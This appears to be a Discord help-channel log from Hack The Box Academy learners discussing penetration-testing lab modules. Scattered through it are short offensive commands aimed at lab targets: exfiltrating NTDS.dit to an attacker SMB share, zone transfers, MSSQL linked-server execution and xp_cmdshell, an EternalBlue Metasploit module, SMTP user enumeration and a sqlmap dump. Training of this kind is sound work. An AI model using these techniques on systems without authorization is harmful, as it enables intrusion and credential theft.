Tried running the powershell commands as per the lesson but couldn't see any output from it even after waiting couple minutes. Does it take really long for the rights to show up?

It takes a few minutes. Send me a DM

Hello,

@thorn urchin Thanks. I found the other user.

Wondering if someone can help. I cant seem to copy NTDS.dit to my local linux system... keeps erroring with
C:> cmd.exe /c move C:\Users\jmarston\Desktop\NTDS.dit \10.10.14.xxx\CompData
cmd.exe : The specified server cannot perform the requested operation.
+ CategoryInfo : NotSpecified: (The specified s...sted operation.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError

(one of the backslashes has been omitted in my message on here. so it aint that)

@loud sapphire use cme

thats not the process tho. i am supposed to use evilwinrm. Its worked before, but just not now.

@loud sapphire if u are using evil-winrm use download option

i can indeed try other things. thank you for the suggestions. But at this time, i need to know why the intended solution isnt working.

I am supposed to create a share on my local system using smbshare.py. This is operational and receives communications from the DC. It just errors out on the winrm side.

any suggestions as to why its not working would help.

@loud sapphire switch to cmd.exe or change the share

change the share in what way?

@loud sapphire from compdata to another name

so nobody has a hint about where to start for the pwd attacks easy lab? 😢

i havent got that far yet. sorry dude.

In the Information security foundations path, setting up is above linux fundamentals, but linux fundamentals is pre-requisite for setting up. What should I do first?

I’d go with Linux fundamentalists

Fundamentals… autocorrect… ugh

can anyone help me with ACTIVE DIRECTORY ENUMERATION & ATTACKS living off the land? I can't seem to find the disabled user

hey! did you manage to get all domain admins? next you could manually check which one of them is disabled

yes can you dm me? i can't dm you

@gloomy tangle @slim plover why yall responding to a question I made two weeks ago lol its all taken care of now.

Its crazy and awesome at the same time, seeing modules improvement over time in #858470491676737536

Content remains best and fresh

There's also a general Change Log for modules on the site, where you can see when modules were added/changed

I definitely agree with the sentiment. It's cool to see improvements over time

Indeed

I managed to log into the password attack labs - easy

But I'm a bit clueless as to how to priv esc

can i dm you??

Sure

Any help on Footprinting Lab - Easy? I was able to ssh in with the given account after getting what I needed on the ftp server. However, I am not sure how I should escalate to root. Any hints be appreciated.

i dont believe you need to escalate

oh

I am dumb ._.

I don't suppose there's a kind soul willing to help me find the name of the hidden 'history' file in the htb-user's home directory, is there? I've been struggling all day with the fundamentals course asking me to perform tasks which seemingly aren't covered in the content before the question.

hidden files usually begin with .

to see them you can use ls -la

Ahh, ty, I had been typing 'ls' and 'ls -a' in the home directory to no avail! It is extremely confusing how I'm supposed to find the solution by myself when it's not discussed in the material leading up to the questions at the end of the section. Am I missing something??

Are you in the right directory? htb-user home dir is probably /home/htb-user/. You can check which dir you are in with pwd

i was 'htb-student@nixfund:~$' '~' is his home right? not root home?

Shell & Payloads:Reverse Shells: is it the IP Address on my Pwnbox/Workstation I set as TCPCLIENT adress in the codesnippit ?

yes

You will find that some things are only touched on in a module and they expect you to dig a little deeper into how a tool is used.

Yes. ~ stands for the home dir of the user you are logged in as. Notice htb-student is different from htb-user, and they have different home dirs

Adding onto that, you are logged in as htb-student, and ~ stands for /home/htb-student in this case. You should change your directory to the home dir of the other user (likely /home/htb-user) and then try to view the hidden file

I believe that is correct. You are making a connection back to your attacking machine

When i typed "cd /home/htb-user" I got the error message, "-bash: cd: /home/htb-user/: No such file or directory" I think they were referring to the htb-student as the htb user but idk?

Yeah I've had to google a lot, and use the '-h, --help, apropos & man' commands an awful lot, using the commands feels justified, but having to resort to yt & google feels like straight-up cheating. Guess it's just going to be a LOT harder than I thought.. ty for help!

I'll dm you

Ty, sorry not trying to fill up the chat but I am SO lost it's not even amusing after 8 straight hours of headache!

googling the answers and googling how to use a tool are different. You have to learn how they work really well to fully utilize them in a RW situation. I have been at this for over a year now and am still learning

this is the normal learning cycle for linux stuff so dont feel bad, embrace it because it never ends 🙂

learning how to find the relevant information and getting comfortable with that will serve you far more in the long run than any module content

Shell & Payloads:Reverse Shells: when I in Powerhsell try to setup a reverse shell I get a very long errormessage from Powershell I have no clue about:

Run the command in cmd (command prompt). I say this because it calls powershell at the beginning

Thank You Very Very Mutch, I have working on this 3-4 hours with no clue and now you helped me to solve it! You are a True Hero!

Anytime! Its all part of the process. Keep pushing forward and you will continue to see success.

hello im new to HTB and wanted to start off with - getting started in cracking into HTB - any tips on if that's a good module to start in or would should do something else to get familiar with HTB

@cursive plover

It can depend on your current knowledge and what you are interested in. Would you say you are familiar with fundamental IT concepts (Basic OS concepts, Linux, Windows and Networking)?

i have an idea of these ,yes. very basic linux command , less on windows and some understanding of networking without having to look at notes if that makes sense

Getting Started would be a good module to start with then.

if i get stuck while doing this is there videos i can follow or any recommendations you have when getting stuck and or just clueless after readying the whole section

I recommend. If you are stuck take some time to consider what you are trying to accomplish, review the section reading (read it multiple times), ask for help here in the Discord, rely on video walkthroughs as a last resort. Im sure others in here have some good advice too

thank you , i would appreciate all the advice i can get

Hey guys working on Footprinting - DNS
Question #2 identifying if its possible to perform a zone transfer. I've read through the zone transfer notes in the section and something isnt quite clicking. Anyone mind breaking it down a little bit for me?

I'm looking at its explanation on Dig-AXFR Zone transfer and it mentions that if "allow-transfer" option is set to any everyone can query the entire zone file.

I feel like this is gonna be real obvious but I'm not quite understanding it and need a slight ELI5 if possible.

i've used ||dig axfr inlanefreight.htb @<IP>|| and I see the information but I guess I dont quite understand how to use this information to determine yes/no on it.

do you get a list of domains or do you get a denied message?

I get a list of domains

then congrats its allowed

Ok I am mad confused, Im doing the Attacking Common Services (SMB) module and I stumbled on the user jason password while working on the previous section for ftp. Now that password apparently was correct as I was able to provide it as an answer. But when I try to use it to connect to the SMB server it wont log me in.

it never says to login via smb as jason

I cant download the private key as anon though 🤔

Hey! I'm having problems to find the linked server on attacking common services - hard lab. I found ||fiona, simon, john, patric and julio ||creds. Also I log via ||rdp with fiona|| creds. I think that's the correct way to found the linked server. Could someone give me a hint please?

why would you

read what the question wants you yo do again

before you can find the linked server you must find creds for the mssql server

Yes, I found creds for mssql I loged in with ||fiona||, impersonated ||John|| and obtain ||julio|| and ||patric|| creds. That's what you mean?

Still stuck on Footprinting - DNS #2
We have confirmed that zone transfer is possible, I'm not understanding how I would go about reading a txt file that is shown.

nslookup and dig both offer ways. Try looking at the man pages

yeah, review the mssql section about linked servers, youre on the right track

not txt file a txt field

Hi all, got a question on Password Attacks module, Pass the Ticket section: How can I get NTLM hashes with Rubeus? Similar to mimikatz "sekurlsa::logonpasswords"

Ok i'm at a total loss, || I know that the 2 users on the client are jason and robin neither passwords mentioned in the hint work for smb. I've tried setting up responder but its radio silence. idk what else to do, i've tried everything they've mentioned on the page. ||

read the final question again, trust me read it aloud if you have to

login via ssh?

🙂

I can't it wants a private key

hmm maybe my memory is playing with me then

frankly im confused how'd you'd get his password at all if I hadn't stumbled on it while working the ftp page.

im at work right now, give me a little bit and ill fire up the instance again and see what my memory has forgotten

cause idr a pub key being needed

someone?

Okay. I found the linked server, thank you. Now I'm looking to know how to execute the command that appear on the module because I recived an error login

try diff users

I'm using this query ||EXECUTE('select @@servername, @@version, CHANGE_USER, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]||

idr off the top of my head if that looks sane or not

idr?

i dont remember

Oh got it

No problem. Thank you

Yea idk I have to just be missing the worlds most obvious thing but it doesnt add up to me....
I've confirmed that I can perform a zone transfer for inlanefreight.htb but I'm apparently doing it wrong as i've submitted the 3 TXT records shown (none of which are HTB(FLAG)) format

So i must not actually be confirming yes/no on the zone transfer with what I'm trying

if youre getting domains then that means youve got the axfr, the confirming yes/no has nothing to do with your end.

Idr if its for that one, but at least one of the dns related sections required you to do multiple dns zone transfers with different zones.

so the first zone transfer may have given you a list of domains and some of those could actually be its own zone as well that you need to attempt a transfer on.

@hardy anchor you need to enable xp_cmdshell to execute commands

Yea idk ive read through this so many times

like what the fuck could i be missing lol

Getting connection refused / host unreachable for everything

😦

@low vine vpn problem

|| I found a way to get the private key using smbmap and providing the password I had. That being said I have no idea what the intended way is to get the password. As I wasn't able to bruteforce it at all, if I hadn't found it while brute forcing ftp in the previous section I would still be stuck. Would love to know what the correct route was. ||

@placid quest im tilted now....fuck me

LOL

||the publicly readable share has password lists that can br used to mino-brute it, which I believe is shared with the ftp server and probably why you found it early||

@low vine maybe download vpn and connect again

Yes. I impersonate ||John||. After that I use ||EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]|| and I recived an output with ||"WINSRV02\SQLEXPRESS Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) testadmin 1"||. At this point I can't enable xp_cmdshell

everything being the target ip or everything being the domains/ip listed. Cause the latter arent real devices

@hardy anchor dm me

try impersonating different users

@thorn urchin Ty for the help and all the help you're giving here.

|| I only saw the rsa key in there. ||Honestly one of the most confusing module pages I've worked, which is werid cause up to this point smb has felt pretty straightforward.

also my own stupidity made me waste way to long on that lol. Glad someone pointed out VPN ><

maybe my memory is just really bad for that module then lol

its only vpn if youre getting that error trying against the target IP

time could also be up if you've been at it for awhile and need to reset the target

Am experiencing the same issue now, connected to vfrank and nada, tried to restart, tried to connect the drive from mlefay and reconnect. Interesting think that it logged me in as Other user and someting vfrank ...thank you

I reset it and gave me the answer immediately on what I was trying to do

nice

may I pm anyone regarding the pivoting module?

options

@pastel ginkgo okay just quickly redid that page, its pretty straightforward actually. ||you use the hint for the jason question to get the pw list from the resources section, use that to brute jason to get the pw, then use the pw to login to the GGJ share, and download the id_rsa key||

Werid when I tried to brute using the resources (even though I knew what the password was) it wouldn't let me login. I even tried a basic smbclient login and it failed.

wait they update that section?

sure shoot me a dm if you still need help

I used smbclient as well but I didnt use the password on the cmdline, as it has the !@ trap thats annoying to deal with, so I just pasted it in when it asked and logged in just fine

yeah thats what I was trying and it returned auth failure

i'll just chock it up to my vm acting up

hint you are impersonate the ||right user|| and you are on the right path if you still need help with that shoot me a dm

heloo

alguem brasileiro aqui?

try ||auxiliary/admin/smb/ms17_010_command|| with the command "dir C:\Users\administrator\Desktop"

WEB ATTACKS Page 8 Mass IDOR Enumeration: can some one help me out im having issue with grep in this section.

or the curl command rather...

i ran curl -s http://SERVER_IP:PORT/documents.php?uid=1 | grep <li class="pure-tree_link"> and got nothing back. I've tried several variations of this but i get nothing back. can someone explain what I'm doing wrong?

Tf

Y'all on some shitty type crosh type shit?

huh?

what does the -s flag do with curl??...

Dawg, I'm saying tf is y'all tryna damn hack?

?

silent tag

...

im tracking

sry brain fart

👍 try -v

Tracking what? Fuckin' gollum?

this is a learning platform.

@granite radish you lost bro

Then were is the better hackers at?

try twitter

Twitter my ass

anyways if youre not here to discuss the academy modules kindly fuck off

Thanks!

hey @spring tundra can you please get this clown outta here. Thanks

:/

<@&861185840277487616> okay can somebody get rid of this clown then

Im here

👍 thanks

Vick is being a Mc DICK

Solid name.

@thorn urchin where are u from?

Im from thischannelisabouttheacademy

I’m still getting the same error message though. I’m not sure I understand since I’m the root user I should have complete permissions right? Also in a real world setting would a web root have to be placed in /var/www?

😦

not necessarily, thats just one of the potential default locations

Often yes /var/www/program here/. It depends on the platform etc. Look at the URL once you get past the login and it should help you figure out where dashboard is.

my note on that section is a bit dumb but first i don't think that's where the uid parameter go and for the grep command if you want to grep <li class="pure-tree_link"> you need to use | grep '<li class="pure-tree_link">'

or try to \ "

yea that too but i do have some issue with bash and multiple "

hint check the target url, you only have write permission ||in that directory||

the single quote worked thanks. i was a bit confused by the output but the quote helped

oh so the uid parameter is in the right place? i really need to update my note on this module

no... i wouldn't do that... im still confused lol

@spring tundra round 2

😂😂

about to ping 0xjb

You might watch the requests with inspector, under network, or better yet in burp to get a feel for what is going on there as well.

ill do that thanks

yep in my note the uid parameter is a ||jason value||

Sorted 👍

thanks again

nice thanks

wont be shocked if round 3 on an alt though

its pretty exciting though...

this is the most active ive seen this server in a bit

idk I always wake up to a billion messages cause the euros come out when Im asleep

maybe i just need to login more..

login to these academy modules haha gottem

lol

I have a dumb question about AD that I think I already know the answer to. But in the active directory attacks and enumeration module, it has sections about attacking a parent domain from a child domain.

I presume the reason why theres no section about parent to child is either cause if you started in the parent domain and comprmised it you already have perms to affect the child domain or is it the attacks work perfectly fine both ways its just phrased from the child to parent perspective?

I'm having a problem in the Active Directory Enumeration & Attacks module. I keep getting this response when I'm trying to enumerate the IP stating none of the hosts are online and so I have no active host to target:

i've reset the box, I've reset and redownloaded the vpn. I have tried this one two PCs, I have 0 idea whats causing this

maybe theyre up but not accpeting ping request?

havent done that module but pretty common for firewalls or hosts to block ping requests

waiting for my nmap scan to finish

somethings wrong ;/

OHH nvm im dumb. I haven't been doing it inside of the ssh'd network

127.0.0.1

😆

😆

this is expert social engineering just ask um for their I.P brilliant!!

Stuck on the Footprinting Med Lab like a noob @.@, ive reached the remost host(WINMEDIUM), ive scoured the user's filesystem and registry, currently... I need direction, ssms is a no go for me , i have both sa/alex's creds...maybe another set of creads from the regs but im not sure

This is day 2 @.@ finally breaking down and askin for tips

Think you need to rdp into the target using alex creds

i have thats where i've been stuck

then you need to access a sql database on the machine using the sql server manager program

yes there exactly is my issue, non of the creds i have are applicable

al,sa, maybe an htb set

ya you need to run the program as administrator using "sa" creds

i feel like im missing some keey part

ok ill try that out

thankyou 🙂

👍

can i dm you?

then this guide is usefull for listing last 200 entries in the database https://www.patrickkeisler.com/2019/05/management-studio-edit-top-200-rows/

yes

:emoji_108:

🖥️

Idk if im being dense but in the Enumerating & Retrieving Password Policies section of AD Enumeration and Attacks it says:

"We can also obtain the password policy. We can see that the password policy is relatively weak, allowing a minimum password of 7 characters."

Yet the code output shows min_password_length: 8

Share a screenshot of that in #858470491676737536

Yea i thought of asking here first because i may be wrong, since one of the questions ask this very same thing and the answer isn't 8.

Hi, I'm currently trapped in "Network Enumeration with Nmap" - Medium Lab. The question is: After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.

Could anyone help me? I've tried --source-ports and some NSE scripts, but still does not show the DNS version. Help would be really appreciated

have you tried tcpdump?

yup, and nothing. Basically you want to bypass IDS using source ports. However, I've tried many, many combinations and nothing 😦

you tried going slower

yup, even with -T0

without templates

Hey I was having some issues a while ago… why don’t you try to run a scan like the one @thorn urchin suggests and use ||at the same time tcpdump to capture the traffic ||

Or try maybe connecting with ||nc to port 80 using also source-port and capture the traffic on another tab with tcpdump||

double checked, dont need to go slow or use tcpdump

you sure youre scanning the right port 😉

There are 2 filtered ports from the whole sample of ports. Yup, tried with both. Port 53 opens if I use UDP instead of TCP, and source-port 53 as well. I can read the version of that one, but that's not the answer. So it must be the another one that I've been tracking but nothing. I could send you a DM if you want more specifications as well 😄

youre probably copying the answer wrong

the format is HTB{stuff}

Yeah if it’s a HTB{} version then you are not copying it right … otherwise since it appears at one time a version that is not HTB{} format then there is something you are missing

I also figured out the manual way grab the banner without nmap at all. A little silly but kinda fun.

It's supposed to use ncat -nv to get it, in theory

It worked for me with nc -nv too

that sounds painful

my manual way used dig

but just good ole nmap is fine

anyways like I said, youve already done the correct thing from what youve said, likely just copied the answer wrong. my visions going blurry so im just gunna go to bed. good luck

Need slight help on Footprinting - SMTP Last question

The one with the email?

Can’t remember exactly

Yea sorry was looking back over it but I'm currently using smtp-user-enum -M < > -U <LIST> -t <IP> -w <longer timeout>

and i've not been able to get any sort of confirmed user

Unsure of where I might be fucking up or how I can confirm if I'm doing the process wrong etc

Hold on let me check my notes quickly

But you need to connect to the server for sure

And then use IMAP commands

wtf are IMAP commands

lol

So i've used telnet to connect previously

In the module it explains

oh thats the next section I'm right before IMAP

I'm on SMTP

@low vine if you can get smtp-user-enum to work for this pls shoot me a dm with how you do it but i did noted down i can't get smtp-user-enum so i use ||auxiliary/scanner/smtp/smtp_enum|| in metasploit for that

Yea I had seen mention of using that was trying to figure out how to do it without 😦

Sorry I confused that one

WAIT

IM SO DUMB

I GOT IT AND DIDNT REALIZZE LOL

Can you type your command in a spoiler form pls?

||smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t <IP> -w 15||

Yup that’s the one that worked for me

I didnt see a spit out so I just didnt realize i had it and thought I had done something wrong

With ||-w 40 || through

jesus christ so the tool was going to fast?

Haha

I wonder if there is a better way to walk through this process

That took me way to long to figure out ><

Maybe if you use some nmap script you can get it directly

Haven’t tried though

that's where learning how to use multiple tool for 1 thing come in handy

But you could start using vuln or check the nse files and search for smtp

I tried nmap script and didnt get it to work right 😦

Bleh its definitely a process. Many more hours of pounding my head to come

I’ll give it a shot for fun but there should be sth imo

Anyway as you say it’s a process

Just have to keep learning and growing

Hi, could anybody give me a nudge for passwords attacks lab - medium? I think I'm pretty far along but I'm stuck now

I've got user d***** but I really don't understand what I'm supposed to do with him

How did you find that user? Just trying to see what part your at...

can i dm you?

sure

Hi, is there anybody I can ask about a question of the Linux privilege escalation module?

nvm I misunderstood the question 😄

how to lsit all the windows partitions using meterpreter?

nvm its show_mount

Hello everyone 🤗,,, how to handle GET parameter secure with uid by using sqlmap

Should I use --randomize

hello im new

Hello! Anyone can help me with the sqlmap module (Running SQLMap on an HTTP Request) ? I'm stuck at the first exercise: What's the contents of table flag2? (Case #2)

I'm using this command : sqlmap -u "http://178.62.106.159:31044/case2.php?id=1" --level 5 --batch -v 3 --dump

but getting only bad requests :(

With sqlmap I like to run the request thru burp and save as a txt file. With sqlmap you can specify the save request file with the '-r' flag.

I'm gonna give it a try. Thank you!

Currently am doing same mod I have found all the 11 flag only flag 2 can't find it ... If you find it let me know pls 😜

Thank you. I've managed to get the flag